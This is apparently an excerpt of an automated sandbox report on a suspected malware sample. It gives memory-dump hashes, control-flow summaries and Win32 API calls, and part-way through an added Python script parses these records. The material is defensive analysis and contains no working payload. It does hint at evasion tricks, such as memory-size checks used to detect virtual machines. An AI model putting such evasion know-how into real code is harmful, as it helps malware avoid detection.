                                              • Instruction Fuzzy Hash: 2E11F2B58003499FCB10CF9AD885BEEFBF8FB48320F108819E959A3210C375A944CFA1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1087d130fb6d44312cebef9ee0f57ff0046e2d24dc6b21f429eef9d78bba83e
                                              • Instruction ID: 545691a995217dd7342763eaff55d19032a53943f0c7cbd307fae8efca272759
                                              • Opcode Fuzzy Hash: c1087d130fb6d44312cebef9ee0f57ff0046e2d24dc6b21f429eef9d78bba83e
                                              • Instruction Fuzzy Hash: D4318F7554C3809FD703DF64ED90715BF61EF46214F18C9EAC8458B2A3D33A980ACB62
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c60a99b6270a3a026040d8d2b59ff031181ae3183534cba7710598adb80c9051
                                              • Instruction ID: 31ef92647f893171befee4bd8f3fde37c408f3817d76fd76217b6997dfe8f849
                                              • Opcode Fuzzy Hash: c60a99b6270a3a026040d8d2b59ff031181ae3183534cba7710598adb80c9051
                                              • Instruction Fuzzy Hash: 3D2180755483809FD703CF64D994715BFB1EF46224F18C9EAD8498B2A7C33A980ACB62
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07153b95db4a26de77347dc0f11264d38db7b336c3bb41093ed780bfe625d2f2
                                              • Instruction ID: 30aa41707091e31aeba86e03eb81bfd412f353ae2af7de056511aa91aa90dcb7
                                              • Opcode Fuzzy Hash: 07153b95db4a26de77347dc0f11264d38db7b336c3bb41093ed780bfe625d2f2
                                              • Instruction Fuzzy Hash: 5221D075604204EFDB05DFA8D980B26BBA5FF89324F24C96DD94A4B346C33AD806CA61
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a2f6675439903229d710c3d2e9dbf6723578ba6062c8111572dd26d0ff13b51
                                              • Instruction ID: e5d30188f4ba1b2e2e8c6d58b2da4633ed20f0791d6a2cdaad802ed06e6d3132
                                              • Opcode Fuzzy Hash: 9a2f6675439903229d710c3d2e9dbf6723578ba6062c8111572dd26d0ff13b51
                                              • Instruction Fuzzy Hash: 9021F275604204EFDB05DF58ED80B26BB65EF88325F24C96DD90A4B396C33AD846CA61
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                              • Instruction ID: 3ef8fe75a6962a9c8e3603b2503cea38b3779a8972d78cf82062e8b8a7523278
                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                              • Instruction Fuzzy Hash: 3E11BB75504280CFDB02CF54D9C4B19BFA1FF85324F28CAAAD8494B356C33AD40ACB62

                                              Execution Graph (rendered as an image in the original report)

                                              Execution Coverage: 8.4%
                                              Dynamic/Decrypted Code Coverage: 100%
                                              Signature Coverage: 0%
                                              Total number of Nodes: 73
                                              Total number of Limit Nodes: 9
                                              Graph summary: two roots, 5eac2d0 and f20848. The 5eac2d0 path reaches LoadLibraryExW via 5eaaadc -> 6850918/6850928 -> 6850b90/6850ba0 -> 6850bd0/6850be0 -> 6850558 -> 6850e30 (addresses in the 06850000 dump of process 16). The f20848 path reaches GlobalMemoryStatusEx via f2133f/f21457 -> f27128 -> 5d6d2a0/5d6d2b0 (calls at 5d6d4f0/5d6d500) and via f27145 -> 5d6e248/5d6e258 -> 5d6d500 (addresses in the 00F20000 and 05D60000 dumps of process 16).
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc0931593aed4dc0e51e964f7cc51f742ba68ed96a611b17d49e392c839b8b24
                                              • Instruction ID: c8c43d1ef44e1d518d684232a4c703e1713fa83483d7d60a698982c477e5a15b
                                              • Opcode Fuzzy Hash: bc0931593aed4dc0e51e964f7cc51f742ba68ed96a611b17d49e392c839b8b24
                                              • Instruction Fuzzy Hash: 87530731D10B1A8ACB51EF68C8845A9F7B1FF99310F11C79AE45877221FB70AAD5CB81
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0c2717c82fb1cba1066a92bb3c0453dabe37e59e78801c42d380f333ccc477b
                                              • Instruction ID: 2831b7bce1c8cc1f7075f91a181e105aa1cc1637b39b651556249f18c5f8fe49
                                              • Opcode Fuzzy Hash: a0c2717c82fb1cba1066a92bb3c0453dabe37e59e78801c42d380f333ccc477b
                                              • Instruction Fuzzy Hash: 3E331D31D107198EDB11EF68C8946ADF7B1FF99300F15C79AE448AB251EB70AAC5CB81
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fe25aa8ccb533990553cf14c7f017971d80cb9882365963de7d26597102b541
                                              • Instruction ID: d6aeffe46a42e3699dcdc2d9771981f587949e7b8bf5dcc56e9edd5ebd4a6de3
                                              • Opcode Fuzzy Hash: 5fe25aa8ccb533990553cf14c7f017971d80cb9882365963de7d26597102b541
                                              • Instruction Fuzzy Hash: 09B15071E002198FDF14CFA9E88579DBBF2BF88324F148529D815E7394EBB4A845DB81
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f2f175c59e0d58a24ca06b27a9d3b3e645c4dd54e393d1b9251063e415e00ff
                                              • Instruction ID: 2283830a645f567e9e5eca55f5a83332d3629782f0cfed638993d1f59a9b4b68
                                              • Opcode Fuzzy Hash: 6f2f175c59e0d58a24ca06b27a9d3b3e645c4dd54e393d1b9251063e415e00ff
                                              • Instruction Fuzzy Hash: 98918FB0E00219DFDF14CFA8E98579EBBF2EF88314F148129E415E7254EB789985DB81

                                              Control-flow Graph (rendered as an image in the original report; legend: executed / not executed)
                                              Basic blocks: 5d6e0b8-5d6e0d3 -> 5d6e0d5-5d6e0fc (call 5d6ce34) and 5d6e0fd-5d6e11c (call 5d6ce40); 5d6e0fd-5d6e11c -> 5d6e122-5d6e181 and 5d6e11e-5d6e121; 5d6e122-5d6e181 -> 5d6e187-5d6e214 (GlobalMemoryStatusEx) and 5d6e183-5d6e186; 5d6e187-5d6e214 -> 5d6e216-5d6e21c and 5d6e21d-5d6e245; 5d6e216-5d6e21c -> 5d6e21d-5d6e245
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3278010210.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_5d60000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3970921be167ca180f3043d50352db0c58e8744cfa8a6b7cf935fbdc5877f374
                                              • Instruction ID: 1e7a128965111393320b95512f602cb30f4260c9ea700fe3e05e2cf809a82407
                                              • Opcode Fuzzy Hash: 3970921be167ca180f3043d50352db0c58e8744cfa8a6b7cf935fbdc5877f374
                                              • Instruction Fuzzy Hash: FC412472D043958FCB11CFB9D84469EBFF5EF89220F14856BD445A7281DB389846CBA0
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06850E09,00000800,?,00000000), ref: 06850E9A
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3280146421.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_6850000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 4d1efc51b1779213d2db22cce5d932c5e8a754a8f953ac827d1be348808fe1cb
                                              • Instruction ID: 68ec9ffc5a3029f998ddf0932ea2d4715d9a4badccc14e6443bd59ce6c09ba38
                                              • Opcode Fuzzy Hash: 4d1efc51b1779213d2db22cce5d932c5e8a754a8f953ac827d1be348808fe1cb
                                              • Instruction Fuzzy Hash: 541126B6C003499FCB10CF9AC844ADEFBF5EB48320F10842AE919A7210C375A545CFA5

                                              Control-flow Graph (rendered as an image in the original report; legend: executed / not executed)
                                              Basic blocks: 6850558-6850e70 -> 6850e72-6850e75 and 6850e78-6850ea7 (LoadLibraryExW); 6850e72-6850e75 -> 6850e78-6850ea7; 6850e78-6850ea7 -> 6850eb0-6850ecd and 6850ea9-6850eaf; 6850ea9-6850eaf -> 6850eb0-6850ecd
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06850E09,00000800,?,00000000), ref: 06850E9A
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3280146421.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_6850000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 435b327bee8359f87d312c60cdb3a4bee3eb13c472ce40e43ce1d4edebc05681
                                              • Instruction ID: 9194e6862eb07bdb96c7ce8599dd3d9bac8ce97dd7d6fa8ca40d90f6f28976e4
                                              • Opcode Fuzzy Hash: 435b327bee8359f87d312c60cdb3a4bee3eb13c472ce40e43ce1d4edebc05681
                                              • Instruction Fuzzy Hash: F51123B6D003498FDB10CF9AC844ADEFBF5EB88320F14842EE919A7210C375A945CFA5
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 05D6E207
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3278010210.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_5d60000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 47e8058dc7c3f02d9ef563d9d8a9d1a15a73a191e4bd622f1e6d71dfab52c1e0
                                              • Instruction ID: 8106c6c3d992b0e8f678406aae367de5890a457dcb9b1d9f00a75c2efbc47cfb
                                              • Opcode Fuzzy Hash: 47e8058dc7c3f02d9ef563d9d8a9d1a15a73a191e4bd622f1e6d71dfab52c1e0
                                              • Instruction Fuzzy Hash: 0E11F3B5C0065A9BCB10CF9AC944BDEFBF8FF48320F14816AD918A7241D778A945CFA5
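The "APIs" / "Memory Dump Source" / "Similarity" records above follow a fixed line format, so they can be parsed rather than read one by one. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it turns those records into structured data and prints which Win32 API each dumped code region calls. Its sample input is a handful of record lines copied from the report. It assumes the .sdmp file-name layout seen above: PID and base address are cross-checked against the snapshot-file names (hcaresult_<pid>_<run>_<base>), while reading the fifth field as the region's page protection (0x40 = PAGE_EXECUTE_READWRITE) is an assumption about the naming. Decoding PostMessageW's message 0x10 as WM_CLOSE is exact; the VM-check note on GlobalMemoryStatusEx is an analyst heuristic, not something the report states.

```python
"""Added example (not part of the Joe Sandbox report or its tooling): parse the
'APIs' / 'Memory Dump Source' / 'Similarity' records into structured data and
print which Win32 API each dumped code region calls."""
import re
from dataclasses import dataclass, field

# Constructed sample input: record lines copied from the report text.
SAMPLE = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016DD58E,?,?,?,?,?), ref: 016DD64F
Memory Dump Source
• Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
• Opcode ID: 45526ce4927f0f446c3432424762af62d59d8911afd95f3fe28cf16568614c2f
• Instruction Fuzzy Hash: C921E4B5D002589FDB10CFAAD984AEEBFF8FB48310F14841AE958A3350D374A940CFA4
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 050D381D
Memory Dump Source
• Source File: 0000000A.00000002.2105124806.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
• Opcode ID: b7ac8bdd7bdd92bfe53d7658f9dc0abe88621b9e16a061629582cbca4b1a33dd
• Instruction Fuzzy Hash: 2E11F2B58003499FCB10CF9AD885BEEFBF8FB48320F108819E959A3210C375A944CFA1
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06850E09,00000800,?,00000000), ref: 06850E9A
Memory Dump Source
• Source File: 00000010.00000002.3280146421.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
• Opcode ID: 435b327bee8359f87d312c60cdb3a4bee3eb13c472ce40e43ce1d4edebc05681
• Instruction Fuzzy Hash: F51123B6D003498FDB10CF9AC844ADEFBF5EB88320F14842EE919A7210C375A945CFA5
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 05D6E207
Memory Dump Source
• Source File: 00000010.00000002.3278010210.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
• Opcode ID: 47e8058dc7c3f02d9ef563d9d8a9d1a15a73a191e4bd622f1e6d71dfab52c1e0
• Instruction Fuzzy Hash: 0E11F3B5C0065A9BCB10CF9AC944BDEFBF8FF48320F14816AD918A7241D778A945CFA5
"""

API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,\s*based on PE:\s*(?P<pe>\w+)")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

WM_CLOSE = 0x10                  # exact Win32 constant
PAGE_EXECUTE_READWRITE = 0x40    # exact Win32 constant


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # raw stack values as logged ('?' = unknown)
    ref: int            # address of the call site


@dataclass
class Record:
    apis: list = field(default_factory=list)
    pid: int = 0
    base: int = 0
    protect: int = 0
    from_pe: bool = False
    opcode_id: str = ""
    instr_fuzzy: str = ""


def parse_dump_name(name):
    """Split a .sdmp name into (pid, base, protection). PID and base agree with
    the 'Snapshot File' names (hcaresult_<pid>_<run>_<base>); reading the fifth
    field as the region's page protection is an ASSUMPTION about the naming."""
    f = name[: -len(".sdmp")].split(".")
    return int(f[0], 16), int(f[3], 16), int(f[4], 16)


def parse_records(text):
    """One Record per function block: a block starts at 'APIs', 'Strings' or a
    bare 'Memory Dump Source' and ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in ("APIs", "Strings") or (line == "Memory Dump Source" and cur is None):
            cur = Record()
            continue
        if cur is None:
            continue
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16)))
        elif m := SRC_RE.match(line):
            cur.pid, cur.base, cur.protect = parse_dump_name(m["name"])
            cur.from_pe = m["pe"].lower() == "true"
        elif m := FIELD_RE.match(line):
            if m["key"] == "Opcode ID":
                cur.opcode_id = m["val"]
            elif m["key"] == "Instruction Fuzzy Hash":
                cur.instr_fuzzy = m["val"]
                records.append(cur)
                cur = None
    return records


def annotate(call):
    """Analyst note per call. The WM_CLOSE decode is exact; the VM-check reading
    of GlobalMemoryStatusEx is a heuristic, not a fact taken from the report."""
    if call.name == "PostMessageW" and len(call.args) > 1 and call.args[1] != "?":
        if int(call.args[1], 16) == WM_CLOSE:
            return "posts WM_CLOSE (0x10) to a window"
    if call.name == "GlobalMemoryStatusEx":
        return "reads physical RAM size; common sandbox/VM size check (heuristic)"
    if call.name in ("LoadLibraryExW", "GetModuleHandleW"):
        return "runtime import resolution"
    return ""


def region_label(rec):
    """'RWX non-image' marks executable, writable memory not backed by a PE file."""
    tag = " RWX non-image" if rec.protect == PAGE_EXECUTE_READWRITE and not rec.from_pe else ""
    return f"pid {rec.pid} @ {rec.base:08X}{tag}"


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        for call in rec.apis:
            print(f"{region_label(rec)}: {call.name} at {call.ref:08X}  {annotate(call)}")
```

Run it over the full report text instead of SAMPLE to get one line per API call site, grouped by the dump it lives in; the "RWX non-image" tag is the quick way to spot which call sites sit in dynamically written code rather than in the mapped executable.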
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHcq
                                              • API String ID: 0-4245845256
                                              • Opcode ID: 1a2a91eba5e237430b51aded464aa8c8add4529fbf2b6d9e764a6817dcec7526
                                              • Instruction ID: e67c7c5e13089a8cf9cb3be1703007ddf362b02bb1d15539014a0e07353b0e4c
                                              • Opcode Fuzzy Hash: 1a2a91eba5e237430b51aded464aa8c8add4529fbf2b6d9e764a6817dcec7526
                                              • Instruction Fuzzy Hash: 6A41BD31B002158FCB06AB34E9547AF7BB2EF89310B284578D406DB392DE34DD4ADBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              • Opcode Fuzzy Hash: ee24836d0bae408ae8eef95c94406454e7eb5a36795b6b1cae2f48407aea8538
                                              • Instruction Fuzzy Hash: 9D216531E04215EBCB19CFA5D55069EB7B6BF99310F20851AE815F7390DBB0AC45CB50
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7b0e9543d888de37519bf1753d270a22583ffed2924ef1a7933920d5664cb05
                                              • Instruction ID: fc02116dc114d23d9020fc50ec59034b0b6ec741d33fab17d25dbc4d66fa27d9
                                              • Opcode Fuzzy Hash: d7b0e9543d888de37519bf1753d270a22583ffed2924ef1a7933920d5664cb05
                                              • Instruction Fuzzy Hash: 2D214F34B00228CFDB14EB78D5547AE77F6BB59354F200468D006EB360DB369D41DBAA
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e794b980bbcc553f64029a8067d9a8fbfc688069dd794102a30afd80bc5311a
                                              • Instruction ID: 35063ecd6b86d956624bdfca7c746215ed972a8c523b972a0c330b61b758a570
                                              • Opcode Fuzzy Hash: 9e794b980bbcc553f64029a8067d9a8fbfc688069dd794102a30afd80bc5311a
                                              • Instruction Fuzzy Hash: A621B778A001514BDF62FB68F884B6D3769FB94320F104E21E006CB259FA34DC889B95
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa7b4db5b039a2ecc6b1b24027212e87b32988a2cae8f247039b3f873bc96efe
                                              • Instruction ID: 54446f79ed23eac720ebf53e94d7ed44fc5a5f13cd9b8ca471052ad9b83cbe10
                                              • Opcode Fuzzy Hash: fa7b4db5b039a2ecc6b1b24027212e87b32988a2cae8f247039b3f873bc96efe
                                              • Instruction Fuzzy Hash: F5212734B00215CFCB54EB78D958BAD7BF1AF88710F2004A8E406EB361EB759D01DBA5
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4df141950730e648c81b8ee3f742fd0a175eadf9ed485fc6038bae412601ac60
                                              • Instruction ID: df6f0a0e46227cfa2576afedccf19ebe9d59c900adf0354c52f466520f74f920
                                              • Opcode Fuzzy Hash: 4df141950730e648c81b8ee3f742fd0a175eadf9ed485fc6038bae412601ac60
                                              • Instruction Fuzzy Hash: AF211634B00215CFCB54EB78D958BAD77F5AB88710F204468E406EB3A1EB75DD00DBA5
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46f802f8a3b9576967a721de4a186ead098cd89c0b0eef29f34406e212d6bd08
                                              • Instruction ID: 5903f7b998aa88b3489ffffde64c960d6c96668e3ef0b091bf05014368a724d1
                                              • Opcode Fuzzy Hash: 46f802f8a3b9576967a721de4a186ead098cd89c0b0eef29f34406e212d6bd08
                                              • Instruction Fuzzy Hash: DE11C131F002158BDF10ABB8B90436EBBE5EB84330F20857AD52AC7285FB35CC459391
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04dde8e92379b97051f4728d9cf3f92b969ab8ef4db10a8f1fec895834ecea5e
                                              • Instruction ID: 72a2eca5e07f43d3f87d74ebbb6b1458c9d905cd794ba458f044092c7f237748
                                              • Opcode Fuzzy Hash: 04dde8e92379b97051f4728d9cf3f92b969ab8ef4db10a8f1fec895834ecea5e
                                              • Instruction Fuzzy Hash: 39119132F002249BDF15AB79E4483AE36A5EB55320F604979E006CB343EE25DCC5ABC1
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fac806d47e7969390236e8dd2c546d49b624085b1fab3ae1ffb0aef920202557
                                              • Instruction ID: 9012b9ef7935f534cf7a0cebd8acdf2888295eee9a0a25aece2ae1271f8a56be
                                              • Opcode Fuzzy Hash: fac806d47e7969390236e8dd2c546d49b624085b1fab3ae1ffb0aef920202557
                                              • Instruction Fuzzy Hash: B511A032F042208BEF656B74E5583BF7651EB51324F644979E006CB243EE24CC85ABC1
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 62517a59d2bbc6b396bd529eefb16b9595061bd4dec488d3f31c2d3851c4060b
                                              • Instruction ID: 42e9bf7190e3a1237a153d935de1699e45bc8ec64b4f5c03f502aee623b7f617
                                              • Opcode Fuzzy Hash: 62517a59d2bbc6b396bd529eefb16b9595061bd4dec488d3f31c2d3851c4060b
                                              • Instruction Fuzzy Hash: B7012131E012248FCB21EFB999511AE7BE5FB59320B14047AD909E7202EB35DD419BE5
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 696b9b7450dcba5d40601a383494712604ab609e67795abcd43e594adc58a9cf
                                              • Instruction ID: d74f47ab55f1046756773eafcb0572192fe54df2ca1fdd7b3961d0844d0c2ad7
                                              • Opcode Fuzzy Hash: 696b9b7450dcba5d40601a383494712604ab609e67795abcd43e594adc58a9cf
                                              • Instruction Fuzzy Hash: C3F0F432B147A42BC7266678692457F3BAA8FC3220F0840BEA945CB292DD20880593A3
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 529014f9abef7a28d6d3f1be6246425b97e095164a586c6baa6f1446e14ff3cc
                                              • Instruction ID: 716beb2f0a2c28e70942de3ba08d38b7fd2cacc5f83a35fe14c2766997679707
                                              • Opcode Fuzzy Hash: 529014f9abef7a28d6d3f1be6246425b97e095164a586c6baa6f1446e14ff3cc
                                              • Instruction Fuzzy Hash: EF01C439B40215CFCB94EB68D698A6C77F2FF88215B5544A8E506CB378DB31AD12CB40
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83d60d36af56b9283d138a6b52faa925b6d243fa8319db19b06893bcebfe693e
                                              • Instruction ID: f95a91b9391164d7364a1aa36c771313928b2f36bd744bdf9381e71507baf473
                                              • Opcode Fuzzy Hash: 83d60d36af56b9283d138a6b52faa925b6d243fa8319db19b06893bcebfe693e
                                              • Instruction Fuzzy Hash: CF017C74900198AFCB02FBB8E991B9D7FB1DF40204F1096A8C40497266EE302E098B50
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 225b99f5be1c0b2e3b6ac3076187e319b153fc142a553a541d7ec31274d18458
